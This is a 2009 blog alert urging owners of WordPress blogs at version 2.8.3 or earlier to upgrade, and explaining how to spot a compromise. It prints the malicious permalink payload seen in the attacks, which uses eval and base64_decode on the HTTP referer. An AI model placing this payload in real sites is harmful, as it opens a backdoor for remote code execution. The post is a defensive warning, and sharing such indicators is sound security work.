ALERT: Old WordPress Blogs Under Attack

All WordPress blogs up to version 2.8.3 are reportedly being attacked and hacked.

The latest WordPress version 2.8.4 seems to be SAFE.

The blogs on WordPress.com are SAFE as the WordPress.com system is up-to-date.

Thank you so much for Lorelle on WP for making a post about this, so I got the news (check Lorelle’s post for all the info).

WordPress News and AlertsUpdate to the Latest WordPress Version

Here’s what you need to do if you have blog(s) that are not updated to the latest WordPress version:

  • Before you continue reading,
  • Go and update ALL YOUR WORDPRESS BLOGS to version 2.8.4.
  • Really, stop reading, it IS that serious.
  • Continue reading after you have UPGRADED your WordPress to the latest version.

Recognizing The Attack

Two clues have been recognized to spot if you’ve already been hacked (here’s hoping you haven’t been):

  • new administrator
    • the second clue is that a “back door” was created by a “hidden” Administrator.
    • Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution.
  • permalinks (Settings –> Permalinks):
    • The keywords are “eval” and “base64_decode.”

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

Secure Your Blog

The News Updates

2009-09-04: News reported on the WordPress.org Support Forums:  HACK WARNING: UPGRADE IMMEDIATELY:

if you don’t upgrade, you will get hacked. It’s not a matter of “if”, it’s a matter of “when”. Don’t wait to be hacked.

2009-09-05: WordPress development blog: How to Keep WordPress Secure

Spread the News!

We need to make sure everyone is informed about this. But stick to the facts, which at the moment is that:

  • Old WordPress blogs up to 2.8.3 are reportedly being attacked
  • WP version 2.8.4 seems to be safe

Re-Tweet to make sure EVERY WordPress blogger is aware of this.

And always, always keep your WordPress and plugins in your blog updated to the latest version!

Read all about this here: Old WordPress Versions Under Attack via Lorelle on WP

Original Warning / News on the WordPress.org Forum: HACK WARNING: UPGRADE IMMEDIATELY

Share and Enjoy:
  • del.icio.us
  • MySpace
  • Digg
  • Reddit
  • StumbleUpon
  • Sphinn
  • FriendFeed
  • Technorati
  • Identi.ca
  • LinkedIn
  • Propeller
  • Mixx
  • HackerNews
  • Tumblr
  • Google Bookmarks
  • Ping.fm
  • Posterous
  • email
  • RSS
Related posts
  1. WordPress 2.8 Upgrade Done. Not All Good.
  2. Upgrade Your WordPress | Checklist
  3. The most essential .htaccess rules for blogs
Share
Topic: WordPress
Tags: ALERT, News, Security, WordPress, WordPress Upgrade
Sep 05, 2009 | Antti Kokkonen | View Comments

Comment policy: We're gonna be like little Fonzies here. And what's Fonzie like? Cool. Correctamundo, and that's how we roll here -- cool. Critical is OK, but if you're rude, spam or otherwise misuse the blog comments, I will delete your comment. Do not put your URL in the comment text. Use your PERSONAL name (yourname@example is cool, example.com without your name is not). Have fun, be excellent to each other and thanks for adding to the conversation!

  • I'm one of those who's quite paranoid about leaving my blog not uptodate. As soon as I get the notification in my dashboard, I hurry and update as I hate being the only guy left. lol. Some folks do suggest we wait like 2 weeks to a month before updating as there may be even worse bugs in the new versions. Example Wordpress was updated like 4 times in a month starting mid July to mid August cos of security issues.
    .-= Udegbunam Chukwudi's last blog ..Top 10 Ways Nigerians Make Money Online =-.
blog comments powered by Disqus
  • Community